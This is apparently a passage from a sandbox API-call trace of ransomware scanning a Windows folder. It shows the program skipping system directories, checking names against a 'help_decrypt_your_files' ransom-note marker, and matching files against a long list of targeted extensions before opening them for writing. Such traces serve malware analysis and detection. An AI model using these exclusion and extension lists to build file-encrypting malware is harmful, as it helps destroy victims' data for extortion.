	[0171.360] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb94a03dd, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1
	[0171.360] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb94caf8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1
	[0171.360] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb94caf8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 0
	[0171.360] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0171.360] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0171.361] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Provisioning", cAlternateFileName="PROVIS~1")) returned 1
	[0171.361] lstrcmpW (lpString1="Provisioning", lpString2="..") returned 1
	[0171.361] lstrcmpW (lpString1="Provisioning", lpString2=".") returned 1
	[0171.361] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0171.361] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0171.361] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0171.362] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0171.362] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0171.362] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0171.362] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*"
	[0171.362] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0171.380] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*") returned 45
	[0171.380] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.380] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\*.*") returned 0x2d
	[0171.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.380] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="windows") returned 0x0
	[0171.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="boot") returned 0x0
	[0171.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="system volume information") returned 0x0
	[0171.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.381] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="temp") returned 0x0
	[0171.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="program files") returned 0x0
	[0171.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.382] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="appdata") returned 0x0
	[0171.382] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.383] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="application data") returned 0x0
	[0171.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.383] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="winnt") returned 0x0
	[0171.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.383] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="tmp") returned 0x0
	[0171.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.383] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="cache") returned 0x0
	[0171.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.384] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.385] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="webcache") returned 0x0
	[0171.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.385] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="inetcache") returned 0x0
	[0171.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.385] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="nvidia") returned 0x0
	[0171.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.386] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="packages") returned 0x0
	[0171.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.386] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="cookies") returned 0x0
	[0171.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.386] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\*.*", lpSrch="programdata") returned 0x0
	[0171.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.386] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11be8600, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11be8600, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11be8600, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6815, dwReserved0=0x0, dwReserved1=0x0, cFileName="countrytable.xml", cAlternateFileName="")) returned 1
	[0171.387] lstrcmpW (lpString1="countrytable.xml", lpString2="..") returned 1
	[0171.387] lstrcmpW (lpString1="countrytable.xml", lpString2=".") returned 1
	[0171.387] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0171.387] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="countrytable.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml"
	[0171.387] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml") returned 58
	[0171.387] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.387] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml", cchLength=0x3a | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml") returned 0x3a
	[0171.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.388] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.388] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml"
	[0171.388] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml") returned 58
	[0171.388] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.388] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.389] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.389] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.389] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.389] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.389] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.389] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0171.391] CloseHandle (hObject=0xffffffff) returned 1
	[0171.391] CloseHandle (hObject=0xffffffff) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", cAlternateFileName="{18DCF~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{1e05dd5d-a022-46c5-963c-b20de341170f}", cAlternateFileName="{1E05D~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{23cb517f-5073-4e96-a202-7fe6122a2271}", cAlternateFileName="{23CB5~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", cAlternateFileName="{3742E~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", cAlternateFileName="{7A30A~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", cAlternateFileName="{8FB7D~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{99b095d8-5959-4820-bea7-7448c8427b4e}", cAlternateFileName="{99B09~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", cAlternateFileName="{9AEC5~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", cAlternateFileName="{9DF6A~1")) returned 1
	[0171.392] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", cAlternateFileName="{B0B91~1")) returned 1
